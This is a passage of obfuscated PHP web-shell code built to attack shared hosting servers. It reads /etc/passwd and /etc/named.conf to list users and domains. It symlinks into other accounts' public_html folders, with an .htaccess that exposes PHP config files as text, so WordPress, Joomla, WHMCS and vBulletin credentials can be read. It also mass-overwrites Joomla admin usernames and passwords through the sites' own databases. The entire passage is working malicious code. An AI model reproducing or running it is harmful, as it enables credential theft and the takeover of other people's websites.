$IIIIIIIIIll1 = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('L2V0Yy9uYW1lZC5jb25m'));
}else{
$IIIIIIIIIll1 = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'));
}
if(!$IIIIIIIIIll1)
{
die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($IIIIIIIIIll1 as $IIIIIIIIIl1l){
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
if($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUlJ')]($GLOBALS['OOO0000O0']('em9uZQ=='),$IIIIIIIIIl1l)){
@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls')]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='),$IIIIIIIIIl1l,$IIIIIIIII1I1);
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
if(@strlen($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIII1I1[1][0])) >2){
$IIIIIIIII1ll = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWwx')](@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMTFJ')]($GLOBALS['OOO0000O0']('L2V0Yy92YWxpYXNlcy8=').$IIIIIIIII1I1[1][0]));
$IIIIIIIII11l=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHA=');
$IIIIIIIII111=@get_headers($IIIIIIIII11l);
$wp=$IIIIIIIII111[0];
$IIIIIIIIlIIl=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocA==');
$IIIIIIIIlII1=@get_headers($IIIIIIIIlIIl);
$IIIIIIIIlIlI=$IIIIIIIIlII1[0];
$IIIIIIIIlIll=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhw');
$IIIIIIIIlIl1=@get_headers($IIIIIIIIlIll);
$IIIIIIIIlI1I=$IIIIIIIIlIl1[0];
$IIIIIIIIlI1l=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2pvb21sYS9jb25maWd1cmF0aW9uLnBocA==');
$IIIIIIIIlI11=@get_headers($IIIIIIIIlI1l);
$IIIIIIIIllII=$IIIIIIIIlI11[0];
$IIIIIIIIllIl=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHA=');
$IIIIIIIIllI1=@get_headers($IIIIIIIIllIl);
$vb=$IIIIIIIIllI1[0];
$IIIIIIIIllll=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHA=');
$IIIIIIIIlll1=@get_headers($IIIIIIIIllll);
$IIIIIIIIll1I=$IIIIIIIIlll1[0];
$IIIIIIIIll1l=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHA=');
$IIIIIIIIll11=@get_headers($IIIIIIIIll1l);
$IIIIIIIIl1II=$IIIIIIIIll11[0];
$IIIIIIIIl1Il=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('cHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocA==');
$IIIIIIIIl1I1= @get_headers($IIIIIIIIl1Il);
$IIIIIIIIl1lI=$IIIIIIIIl1I1[0];
$IIIIIIIIl1ll=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHA=');
$IIIIIIIIl1I1= @get_headers($IIIIIIIIl1ll);
$IIIIIIIIl1l1=$IIIIIIIIl1I1[0];
$IIIIIIIIl11I=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocA==');
$IIIIIIIIl11l= @get_headers($IIIIIIIIl11I);
$IIIIIIIIl111=$IIIIIIIIl11l[0];
$IIIIIIII1III=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL3N1Ym1pdHRpY2tldC5waHA=');
$IIIIIIII1IIl= @get_headers($IIIIIIII1III);
$IIIIIIII1II1=$IIIIIIII1IIl[0];
$IIIIIIII1IlI=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocA==');
$IIIIIIII1Ill= @get_headers($IIIIIIII1IlI);
$IIIIIIII1Il1=$IIIIIIII1Ill[0];
$IIIIIIII1I1I = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($wp,$GLOBALS['OOO0000O0']('MjAw'));
$IIIIIIII1I11=$GLOBALS['OOO0000O0']('Jm5ic3A7');
if ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($wp,$GLOBALS['OOO0000O0']('MjAw')) == true )
{
$IIIIIIII1I11="<a href='".$IIIIIIIII11l."' target='_blank'>Wordpress</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIlIlI,$GLOBALS['OOO0000O0']('MjAw')) == true)
{
$IIIIIIII1I11="<a href='".$IIIIIIIIlIIl."' target='_blank'>Wordpress</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIlI1I,$GLOBALS['OOO0000O0']('MjAw'))  == true and $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIII1II1,$GLOBALS['OOO0000O0']('MjAw'))  == true )
{
$IIIIIIII1I11=" <a href='".$IIIIIIII1III."' target='_blank'>WHMCS</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIl1l1,$GLOBALS['OOO0000O0']('MjAw'))  == true)
{
$IIIIIIII1I11 =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIl111,$GLOBALS['OOO0000O0']('MjAw'))  == true)
{
$IIIIIIII1I11 =" <a href='".$IIIIIIIIl11I."' target='_blank'>WHMCS</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIlI1I,$GLOBALS['OOO0000O0']('MjAw'))  == true)
{
$IIIIIIII1I11=" <a href='".$IIIIIIIIlIll."' target='_blank'>Joomla</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIllII,$GLOBALS['OOO0000O0']('MjAw'))  == true)
{
$IIIIIIII1I11=" <a href='".$IIIIIIIIlI1l."' target='_blank'>Joomla</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($vb,$GLOBALS['OOO0000O0']('MjAw'))  == true)
{
$IIIIIIII1I11=" <a href='".$IIIIIIIIllIl."' target='_blank'>vBulletin</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIll1I,$GLOBALS['OOO0000O0']('MjAw'))  == true)
{
$IIIIIIII1I11=" <a href='".$IIIIIIIIllll."' target='_blank'>vBulletin</a>";
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIl1II,$GLOBALS['OOO0000O0']('MjAw'))  == true)
{
$IIIIIIII1I11=" <a href='".$IIIIIIIIll1l."' target='_blank'>vBulletin</a>";
}
else
{
continue;
}
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$IIIIIIII1lII = $IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')] ;
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
echo $GLOBALS['OOO0000O0']('PHRyPjx0ZD48YSBocmVmPWh0dHA6Ly93d3cu').$IIIIIIIII1I1[1][0].$GLOBALS['OOO0000O0']('Lz4=').$IIIIIIIII1I1[1][0].$GLOBALS['OOO0000O0']('PC9hPjwvdGQ+DQo8dGQ+').$IIIIIIII1I11.$GLOBALS['OOO0000O0']('PC90ZD48L3RyPg==');$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}
}
}
}
break;
case $GLOBALS['OOO0000O0']('c3lt'):
if(!$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbGxs')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'))){
$IIIIIIIIIll1 = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('L2V0Yy9uYW1lZC5jb25m'));
}else{
$IIIIIIIIIll1 = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'));
}
if(!$IIIIIIIIIll1)
{
die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($IIIIIIIIIll1 as $IIIIIIIIIl1l){
if($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUlJ')]($GLOBALS['OOO0000O0']('em9uZQ=='),$IIIIIIIIIl1l)){
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls')]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='),$IIIIIIIIIl1l,$IIIIIIIII1I1);
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
if(strlen($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIII1I1[1][0])) >2){
$IIIIIIIII1ll = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWwx')](@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMTFJ')]($GLOBALS['OOO0000O0']('L2V0Yy92YWxpYXNlcy8=').$IIIIIIIII1I1[1][0]));
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$IIIIIIII1lII = $IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')] ;
@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbEls')]($GLOBALS['OOO0000O0']('Lw=='),$GLOBALS['OOO0000O0']('c3ltL3Jvb3Q='));
$IIIIIIII1lII = $IIIIIIIII1I1[1][0];
$ir = $GLOBALS['OOO0000O0']('aXI=');
$il = $GLOBALS['OOO0000O0']('aWw=');
if ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxbGxJ')]("/.^$ir/",$IIIIIIIII1I1[1][0]) or $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxbGxJ')]("/.^$il/",$IIIIIIIII1I1[1][0]) )
{
$IIIIIIII1lII = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIII1I1[1][0].$GLOBALS['OOO0000O0']('PC9kaXY+');
}
echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$IIIIIIIII1I1[1][0].$GLOBALS['OOO0000O0']('Lz4=').$IIIIIIII1lII.$GLOBALS['OOO0000O0']('IDwvYT4gPC9kaXY+DQo8L3RkPg0KDQoNCjx0ZD4NCg==').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')]."
</td>






<td>
<a href='sym/root/home/".$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')]."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}
}
}
}
break;
case $GLOBALS['OOO0000O0']('ZmlsZQ=='):
echo$GLOBALS['OOO0000O0']('DQpUaGUgZmlsZSBwYXRoIHRvIHN5bWxpbmsNCg0KPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9In?Bvc3QiPg0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImZpbGUiIHZhbHVlPSIvaG9tZS91c2VyL3B1Ym?xpY19odG1sL2ZpbGUubmFtZSIgc2l6ZT0iNjAiLz48YnIgLz48YnIgLz4NCjxpbnB1dCB0eXBlPSJ0ZX?h0IiBuYW1lPSJzeW1maWxlIiB2YWx1ZT0iZmlsZS5uYW1lX3N5bSAoIEV4LiA6OiByb3lhbGlzdGUudH?h0ICkiIHNpemU9IjYwIi8+PGJyIC8+PGJyIC8+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic3?ltbGluayIgbmFtZT0ic3ltbGluayIgLz4gPGJyIC8+PGJyIC8+DQoNCg0KDQo8L2Zvcm0+DQo=');
$IIIIIIII1lll = $_POST[$GLOBALS['OOO0000O0']('ZmlsZQ==')];
$symfile = $_POST[$GLOBALS['OOO0000O0']('c3ltZmlsZQ==')];
$symlink = $_POST[$GLOBALS['OOO0000O0']('c3ltbGluaw==')];
if ($symlink)
{
@mkdir($GLOBALS['OOO0000O0']('c3ltMQ=='),0777);
$IIIIIIII1l1l  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$IIIIIIIIII1l =@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')] ($GLOBALS['OOO0000O0']('c3ltMS8uaHRhY2Nlc3M='),$GLOBALS['OOO0000O0']('dw=='));
@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbElJ')]($IIIIIIIIII1l ,$IIIIIIII1l1l);
@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbEls')]("$IIIIIIII1lll","sym1/$symfile");
echo $GLOBALS['OOO0000O0']('PGJyIC8+PGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9InN5bTEv').$symfile.$GLOBALS['OOO0000O0']('IiA+').$symfile.$GLOBALS['OOO0000O0']('PC9hPg==');
}
break;
case $GLOBALS['OOO0000O0']('cmVhZA=='):
echo $GLOBALS['OOO0000O0']('cmVhZCAvZXRjL25hbWVkLmNvbmY=');
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$file = $GLOBALS['OOO0000O0']('L2V0Yy9uYW1lZC5jb25m');
$IIIIIIII11II = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')]($file,$GLOBALS['OOO0000O0']('cg=='));
if ($IIIIIIII11II){
$IIIIIIII11Il = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMUkx')]($IIIIIIII11II,@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWxJ')]($file));
echo $GLOBALS['OOO0000O0']('').$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWxs')]($IIIIIIII11Il).$GLOBALS['OOO0000O0']('');
}
else if (!$IIIIIIII11II)
{
$IIIIIIII11II = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWwx')]($file) ;
}
else if (!$IIIIIIII11II)
{
$IIIIIIII11II = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMTFJ')]($file);
}
else if (!$IIIIIIII11II)
{
$IIIIIIII111l = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbEls')]($file,$GLOBALS['OOO0000O0']('c3ltLnR4dA=='));
if ($IIIIIIII111l){
$IIIIIIII11II = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')]($GLOBALS['OOO0000O0']('c3ltL3N5bS50eHQ='),$GLOBALS['OOO0000O0']('cg=='));
$IIIIIIII11Il = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMUkx')]($IIIIIIII11II,@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWxJ')]($file));
echo $GLOBALS['OOO0000O0']('').$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWxs')]($IIIIIIII11Il).$GLOBALS['OOO0000O0']('');
}
}
echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
if(isset($_GET[$GLOBALS['OOO0000O0']('c2F2ZQ==')])){
$IIIIIIII1111 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJSUlJ')]($_POST[$GLOBALS['OOO0000O0']('ZmlsZQ==')]);
$IIIIIIIIII1l = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'),$GLOBALS['OOO0000O0']('dw=='));
$w = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbElJ')]($IIIIIIIIII1l,$IIIIIIII1111);
if($w){
echo $GLOBALS['OOO0000O0']('PGJyIC8+c2F2ZSBoYXMgYmVlbiBzdWNjZXNzZnVsbHk=');
}
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJSUkx')]($IIIIIIIIII1l);
}
break;
case $GLOBALS['OOO0000O0']('cGFzc3dk'):
if(isset($_GET[$GLOBALS['OOO0000O0']('c2F2ZQ==')]) and isset($_POST[$GLOBALS['OOO0000O0']('ZmlsZQ==')]) or @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWxJ')]($GLOBALS['OOO0000O0']('cGFzc3dkLnR4dA==')) >0){
$IIIIIIII1111 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJSUlJ')]($_POST[$GLOBALS['OOO0000O0']('ZmlsZQ==')]);
if(!file_exists($GLOBALS['OOO0000O0']('cGFzc3dkLnR4dA=='))){
$IIIIIIIIII1l = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')]($GLOBALS['OOO0000O0']('cGFzc3dkLnR4dA=='),$GLOBALS['OOO0000O0']('dw=='));
$w = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbElJ')]($IIIIIIIIII1l,$IIIIIIII1111);
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJSUkx')]($IIIIIIIIII1l);
}
if($w or @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWxJ')]($GLOBALS['OOO0000O0']('cGFzc3dkLnR4dA==')) >0){
echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$IIIIIIIlIIlI = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('cGFzc3dkLnR4dA=='));
foreach ($IIIIIIIlIIlI as $IIIIIIIIII1l){
$IIIIIIIIIII1=$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]($GLOBALS['OOO0000O0']('Og=='),$IIIIIIIIII1l);
$IIIIIIIII1ll = $IIIIIIIIIII1[$GLOBALS['OOO0000O0']('MA==')];
echo "
<tr>



<td width='15%'>
$IIIIIIIII1ll
</td>






<td width='10%'>
<a href='sym/root/home/$IIIIIIIII1ll/public_html' target='_blank'>Symlink </a>
</td>

<td width='10%'>
<a href='$IIIIIIIIIIl1/sym/root/home/$IIIIIIIII1ll/public_html' target='_blank'>FTP</a>
</td>



</tr></div> ";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}
die ($GLOBALS['OOO0000O0']('PC90cj48L2Rpdj4='));
}
}
echo $GLOBALS['OOO0000O0']('cmVhZCAvZXRjL3Bhc3N3ZA==');
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$file = $GLOBALS['OOO0000O0']('L2V0Yy9wYXNzd2Q=');
$IIIIIIII11II = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')]($file,$GLOBALS['OOO0000O0']('cg=='));
if ($IIIIIIII11II){
$IIIIIIII11Il = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMUkx')]($IIIIIIII11II,@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWxJ')]($file));
echo $GLOBALS['OOO0000O0']('').$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWxs')]($IIIIIIII11Il).$GLOBALS['OOO0000O0']('');
}
elseif(!$IIIIIIII11II)
{
$IIIIIIII11II = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMWwx')]($file) ;
}
elseif(!$IIIIIIII11II)
{
$IIIIIIII11II = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxMTFJ')]($file);
}
elseif(!$IIIIIIII11II)
{
for($IIIIIIIlIIll=0;$IIIIIIIlIIll<1000;$IIIIIIIlIIll++){
$IIIIIIIlIIl1 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWwx')]($IIIIIIIlIIll);
if (!empty($IIIIIIIlIIl1)) {
while (list ($IIIIIIIlII1I,$IIIIIIIlII1l) = each($IIIIIIIlIIl1)){
print "$IIIIIIIlII1l:";
}
print "\n";
}
}
}
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
break;
case $GLOBALS['OOO0000O0']('am9vbWxh'):
if(isset($_POST[$GLOBALS['OOO0000O0']('cw==')])){
$file = @file_get_contents($GLOBALS['OOO0000O0']('am9vbWxhLnR4dA=='));
$IIIIIIIlII11   = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]("\n",$file);
echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
foreach ($IIIIIIIlII11 as $IIIIIIIlIlII){
$IIIIIIIlIlIl   = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]($GLOBALS['OOO0000O0']('fHw='),$IIIIIIIlIlII);
$IIIIIIII1I11 = $IIIIIIIlIlIl[0];
$IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
$IIIIIIIlIllI = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIlIlI1).$GLOBALS['OOO0000O0']('');
$IIIIIIIlIlll  = @file_get_contents($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIII1I11));
if($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJbGwx')]($GLOBALS['OOO0000O0']('SkNvbmZpZw=='),$IIIIIIIlIlll)){
$IIIIIIIlIl1I    =  IIIIIIIllll1($IIIIIIIlIlll,$GLOBALS['OOO0000O0']('JHBhc3N3b3JkID0gJw=='),"';");
$IIIIIIIlIl1l  =  IIIIIIIllll1($IIIIIIIlIlll,$GLOBALS['OOO0000O0']('JHVzZXIgPSAn'),"';");
$IIIIIIIlIl11      =  IIIIIIIllll1($IIIIIIIlIlll,$GLOBALS['OOO0000O0']('JGRiID0gJw=='),"';");
$IIIIIIIlI1II     =  IIIIIIIllll1($IIIIIIIlIlll,$GLOBALS['OOO0000O0']('JGRicHJlZml4ID0gJw=='),"';");
$IIIIIIIlI1Il     =  $IIIIIIIlI1II.$GLOBALS['OOO0000O0']('dXNlcnM=');
$IIIIIIIlI1I1     = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJMWxJ')]($GLOBALS['OOO0000O0']('bG9jYWxob3N0'),$IIIIIIIlIl1l,$IIIIIIIlIl1I);
$IIIIIIIlIl11      = @mysql_select_db($IIIIIIIlIl11,$IIIIIIIlI1I1);
$IIIIIIIlI1ll   = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJMWwx')]("UPDATE `$IIIIIIIlI1Il`  SET `username` ='sec-w.com'");
$IIIIIIIlI11I  = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJMWwx')]("UPDATE `$IIIIIIIlI1Il`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
if ($IIIIIIIlI1ll and $IIIIIIIlI11I ){$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOiAjMDA2NjAwIj5TdWNjZWVkIDwvYj51c2VyIFtzZWMtdy5jb21dIHBhc3?MgWzFdPC9iPg==');}else{$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOnJlZCI+ZmFpbGVkPC9iPg==');}
$IIIIIIIlIllI = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIlIlI1).$GLOBALS['OOO0000O0']('');
echo "<tr>
<td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
<td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>".$r.$GLOBALS['OOO0000O0']('PC90ZD48L3RyPg==');
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}else{
echo "<tr>
<td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
<td><a target='_blank' href='http://$IIIIIIIlIlII'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}
}
die();
}
if(!$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbGxs')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'))){
$IIIIIIIIIll1 = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('L2V0Yy9uYW1lZC5jb25m'));
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}else{
